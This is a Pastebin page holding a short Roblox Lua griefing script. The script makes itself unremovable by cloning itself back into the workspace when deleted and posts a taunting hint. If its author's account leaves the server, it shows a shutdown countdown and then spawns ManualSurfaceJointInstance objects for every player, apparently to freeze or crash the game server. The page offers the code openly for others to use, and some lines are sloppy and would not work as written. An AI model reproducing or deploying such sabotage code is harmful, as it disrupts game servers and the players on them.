Advertisement
memberhero

Untitled

May 8th, 2016
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. local Settings={["Un_Removable"]= "On"}
  2. local function mFloor(x) return x - x % 1 end
  3. local Un_Removable = tostring(Settings["Un_Removable"]):lower() == "on"
  4. if Un_Removable then
  5. Game.Workspace.DescendantRemoving:connect(function(Child)
  6. if not Remove_At_Will and Child == script then
  7. script:Clone().Parent = Game.Workspace
  8. end
  9. end)
  10. end --remove the unremoveable if you want...
  11. c = Instance.new("Hint")
  12. c.Text = "Lol,Don't remove hyperionGM,or denny1971 or the server becomes DERPY!" --change your name to mine
  13. c.Parent = game.Workspace
  14. text = {"Noob,you kicked me?THE SERVER WILL NOW BECOME NUKED in"} --also a message thing
  15. wait(1)
  16. text = {"Server Freeze Shutdown in 5"}
  17. wait(1)
  18. text = {"Server Freeze Shutdown in 4"}
  19. wait(1)
  20. text = {"Server Freeze Shutdown in 3"}
  21. wait(1)
  22. text = {"Server Freeze Shutdown in 2"}
  23. wait(1)
  24. text = {"Server Freeze Shutdown in 1"}
  25. wait(1)
  26. text = {"Server Freeze Shutdown in 0"}
  27. wait(1)
  28. text = {"The Server will now shutdown Good day sir!"}
  29. while wait(2) do
  30. if not game.Players:FindFirstChild("memberhero","memberhero") then
  31. local m = Instance.new("Message") m.Parent = Workspace
  32. for i,v in pairs(text) do
  33. m.Text = v
  34. wait(1)
  35. end
  36. for i,v in pairs(game.Players:GetChildren()) do
  37. Instance.new("ManualSurfaceJointInstance", workspace)
  38. end
  39. end
  40. end
  41. serverkill = true
  42. --lol!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement